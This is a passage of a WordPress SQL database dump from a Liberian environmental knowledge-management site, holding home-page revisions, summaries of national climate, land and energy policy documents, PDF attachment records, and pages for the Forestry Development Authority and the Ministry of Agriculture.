United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:48:18','2019-11-14 16:48:18','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2145,1,'2019-11-14 16:51:37','2019-11-14 16:51:37','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:51:37','2019-11-14 16:51:37','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2146,1,'2019-11-14 16:52:19','2019-11-14 16:52:19','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:52:19','2019-11-14 16:52:19','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2147,1,'2019-11-14 16:54:47','2019-11-14 16:54:47','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:54:47','2019-11-14 16:54:47','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2148,1,'2019-11-14 17:37:42','2019-11-14 17:37:42','An Act to establish the Land Rights Law of 2018, Republic of Liberia','Signed Land Rights Act','','publish','closed','closed','','signed-land-rights-act','','','2022-12-06 11:02:56','2022-12-06 11:02:56','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2148',145,'document','',0),(2149,1,'2019-11-14 17:35:40','2019-11-14 17:35:40','','2018 Signed-Land-Rights-Act','','inherit','open','closed','','2018-signed-land-rights-act','','','2019-11-14 17:35:40','2019-11-14 17:35:40','',2148,'https://ekmsliberia.info/wp-content/uploads/2019/11/2018-Signed-Land-Rights-Act.pdf',0,'attachment','application/pdf',0),(2150,1,'2019-11-14 17:46:45','2019-11-14 17:46:45','The impacts of climate change are even more evident and pervasive with increased occurrences of flooding across the country, changes in climatic conditions, as well as low agricultural yields in Liberia and other parts of the world. Undeniably, climate change is a major environmental threat facing the social and economic development of Less Developed Countries like ours being more vulnerable to the impacts due to their low capacity to adapt to the impact of Climate Change.','National Policy and Reform Strategy on Climate Change','','publish','closed','closed','','national-policy-and-reform-strategy-on-climate-change','','','2022-12-06 11:02:39','2022-12-06 11:02:39','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2150',144,'document','',0),(2151,1,'2019-11-14 17:44:18','2019-11-14 17:44:18','','2018 UNDP_lr_National Policy and Response Strategy on Climate Change (1)','','inherit','open','closed','','2018-undp_lr_national-policy-and-response-strategy-on-climate-change-1','','','2019-11-14 17:44:18','2019-11-14 17:44:18','',2150,'https://ekmsliberia.info/wp-content/uploads/2019/11/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1.pdf',0,'attachment','application/pdf',0),(2152,1,'2019-11-14 17:54:40','2019-11-14 17:54:40','An Act to establish a monitoring, coordinating and supervisory authority for the sustainable management of the environment in partnership with regulated Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith.','An Act Creating the EPA','','publish','closed','closed','','an-act-creating-the-epa','','','2022-12-06 11:01:47','2022-12-06 11:01:47','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2152',143,'document','',0),(2153,1,'2019-11-14 17:54:12','2019-11-14 17:54:12','','Act creating the EPA 2002','','inherit','open','closed','','act-creating-the-epa-2002','','','2019-11-14 17:54:12','2019-11-14 17:54:12','',2152,'https://ekmsliberia.info/wp-content/uploads/2019/11/Act-creating-the-EPA-2002.pdf',0,'attachment','application/pdf',0),(2154,1,'2019-11-14 18:02:53','2019-11-14 18:02:53','Liberia’s Initial National Communication (INC) is in compliance with decision 17 CP/8; guidelines for the preparation of national communications from Parties not included in Annex I to the Convention from 23 October to 1 November 2002.','Liberia Initial National Communication','','publish','closed','closed','','liberia-initial-national-communication','','','2022-12-06 11:01:27','2022-12-06 11:01:27','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2154',142,'document','',0),(2155,1,'2019-11-14 18:02:09','2019-11-14 18:02:09','','initial national communication','','inherit','open','closed','','initial-national-communication','','','2019-11-14 18:02:09','2019-11-14 18:02:09','',2154,'https://ekmsliberia.info/wp-content/uploads/2019/11/initial-national-communication.pdf',0,'attachment','application/pdf',0),(2156,1,'2019-11-14 18:12:53','2019-11-14 18:12:53','An IPCC special report on the impacts of global warming of 1.5 °C above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change, sustainable development, and efforts to eradicate poverty.','IPCC Intergovernmental Panel on Climate Change','','publish','closed','closed','','ipcc-intergovernmental-panel-on-climate-change','','','2022-12-06 11:01:07','2022-12-06 11:01:07','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2156',141,'document','',0),(2157,1,'2019-11-14 18:11:48','2019-11-14 18:11:48','','IPCC 2018 Special Report 1.5','','inherit','open','closed','','ipcc-2018-special-report-1-5','','','2019-11-14 18:11:48','2019-11-14 18:11:48','',2156,'https://ekmsliberia.info/wp-content/uploads/2019/11/IPCC-2018-Special-Report-1.5.pdf',0,'attachment','application/pdf',0),(2158,1,'2019-11-14 18:13:34','2019-11-14 18:13:34','','featured_marine','Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia','inherit','open','closed','','featured_marine','','','2019-11-15 12:19:34','2019-11-15 12:19:34','',488,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg',0,'attachment','image/jpeg',0),(2159,1,'2019-11-14 18:20:02','2019-11-14 18:20:02','The Agenda for Transformation (AfT) is the Government of Liberia’s five-year development strategy. It follows the Lift Liberia Poverty Reduction Strategy (PRS), which raised Liberia from post-conflict emergency reconstruction and positioned it for future growth.','Agenda for Transformation','','publish','closed','closed','','agenda-for-transformation','','','2022-12-06 11:00:46','2022-12-06 11:00:46','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2159',140,'document','',0),(2160,1,'2019-11-14 18:18:27','2019-11-14 18:18:27','','Liberia Agenda for transformation.AfT','','inherit','open','closed','','liberia-agenda-for-transformation-aft','','','2019-11-14 18:18:27','2019-11-14 18:18:27','',2159,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Agenda-for-transformation.AfT_.pdf',0,'attachment','application/pdf',0),(2161,1,'2019-11-14 18:31:34','2019-11-14 18:31:34','Liberia’s INDC presents a context for the global effort to create a new international climate agreement by the end of the Paris Climate Summit in December 2015, in order to limit temperature increase to 2°C. Liberia recognizes the current and future threats of climate change and has been taking initiatives toward addressing these threats.','Intended Nationally Determined Contributions of Liberia','','publish','closed','closed','','intended-nationally-determined-contributions-of-liberia','','','2022-12-06 11:00:27','2022-12-06 11:00:27','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2161',139,'document','',0),(2162,1,'2019-11-14 18:23:17','2019-11-14 18:23:17','','featured_education_youth','','inherit','open','closed','','featured_education_youth','','','2019-11-14 18:23:17','2019-11-14 18:23:17','',484,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_education_youth.jpg',0,'attachment','image/jpeg',0),(2164,1,'2019-11-14 18:29:14','2019-11-14 18:29:14','','Liberia INDC Final Submission Sept 30 2015.002','','inherit','open','closed','','liberia-indc-final-submission-sept-30-2015-002','','','2019-11-14 18:29:14','2019-11-14 18:29:14','',2161,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf',0,'attachment','application/pdf',0),(2165,1,'2019-11-14 18:50:43','2019-11-14 18:50:43','The National Adaptation Programme of Action (NAPA) has been prepared by the Environmental Protection Agency based on the initiative that emerged from the Seventh Session of the Conference of the Parties (COP-7) of the United Nations Framework Convention on Climate Change (UNFCCC) held in Marrakech in 2001.','Liberia National Adaptation Programme of Action','','publish','closed','closed','','liberia-national-adaptation-programme-of-action','','','2021-09-23 12:14:29','2021-09-23 12:14:29','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2165',138,'document','',0),(2166,1,'2019-11-14 18:36:37','2019-11-14 18:36:37','','Liberia NAPA 2008','','inherit','open','closed','','liberia-napa-2008','','','2019-11-14 18:36:37','2019-11-14 18:36:37','',2165,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-NAPA-2008.pdf',0,'attachment','application/pdf',0),(2167,1,'2019-11-14 18:43:40','2019-11-14 18:43:40','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-14 18:43:40','2019-11-14 18:43:40','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2168,1,'2019-11-14 18:44:30','2019-11-14 18:44:30','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-14 18:44:30','2019-11-14 18:44:30','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2169,1,'2019-11-14 18:44:45','2019-11-14 18:44:45','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-14 18:44:45','2019-11-14 18:44:45','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2170,1,'2019-11-14 18:44:59','2019-11-14 18:44:59','','Liberia NAPA 2008','','inherit','open','closed','','liberia-napa-2008-2','','','2019-11-14 18:44:59','2019-11-14 18:44:59','',2165,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-NAPA-2008-1.pdf',0,'attachment','application/pdf',0),(2172,1,'2019-11-14 18:49:26','2019-11-14 18:49:26','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p><p>Integrating the 3Cs approach, FDA works to Conserve and sustainably manage all forest resources to enable them continue to provision of a complete range of goods and services for the benefit of all Liberians and also contribute to poverty reduction</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-14 18:49:26','2019-11-14 18:49:26','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2173,1,'2019-11-14 18:52:58','2019-11-14 18:52:58','<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-14 18:52:58','2019-11-14 18:52:58','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2174,1,'2019-11-14 18:59:36','2019-11-14 18:59:36','','FDA Sidebar','','publish','closed','closed','','fda-sidebar','','','2019-11-14 19:01:07','2019-11-14 19:01:07','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2174',0,'sidebar','',0),(2175,1,'2019-11-14 18:59:04','2019-11-14 18:59:04','','','','publish','closed','closed','','2175','','','2019-11-14 18:59:10','2019-11-14 18:59:10','',2174,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2175',1,'condition_group','',0),(2176,1,'2019-11-14 19:00:48','2019-11-14 19:00:48','','MOA Sidebar','','publish','closed','closed','','moa-sidebar','','','2019-11-14 19:00:48','2019-11-14 19:00:48','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2176',0,'sidebar','',0),(2177,1,'2019-11-14 19:00:17','2019-11-14 19:00:17','','','','publish','closed','closed','','2177','','','2019-11-14 19:00:26','2019-11-14 19:00:26','',2176,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2177',1,'condition_group','',0),(2178,1,'2019-11-14 19:05:19','2019-11-14 19:05:19','The National Energy Policy (NEP) is the product of an extensive process of consultations that started with the National Energy Stakeholders Forum (NESF) in October 2006. Recommendations from that forum were summarized in the National Energy Sector White Paper published in February 2007. After a process of scrutiny and validation involving all key stakeholders, the White Paper has now been transformed into the NEP.','National Energy Policy','','publish','closed','closed','','national-energy-policy','','','2022-12-06 10:59:10','2022-12-06 10:59:10','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2178',137,'document','',0),(2179,1,'2019-11-14 19:04:39','2019-11-14 19:04:39','','National Energy Policy 2009','','inherit','open','closed','','national-energy-policy-2009','','','2019-11-14 19:04:39','2019-11-14 19:04:39','',2178,'https://ekmsliberia.info/wp-content/uploads/2019/11/National-Energy-Policy-2009.pdf',0,'attachment','application/pdf',0),(2180,1,'2019-11-14 19:06:09','2019-11-14 19:06:09','','fda_logo','','inherit','open','closed','','fda_logo','','','2021-08-17 18:52:19','2021-08-17 18:52:19','',1586,'https://ekmsliberia.info/wp-content/uploads/2019/11/fda_logo.png',0,'attachment','image/png',0),(2182,1,'2019-11-14 19:09:09','2019-11-14 19:09:09','','moa_logo','','inherit','open','closed','','moa_logo','','','2021-08-17 20:45:30','2021-08-17 20:45:30','',1600,'https://ekmsliberia.info/wp-content/uploads/2019/11/moa_logo.png',0,'attachment','image/png',0),(2183,1,'2019-11-14 19:12:48','2019-11-14 19:12:48','<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-14 19:12:48','2019-11-14 19:12:48','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2184,1,'2019-11-14 19:13:15','2019-11-14 19:13:15','<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" 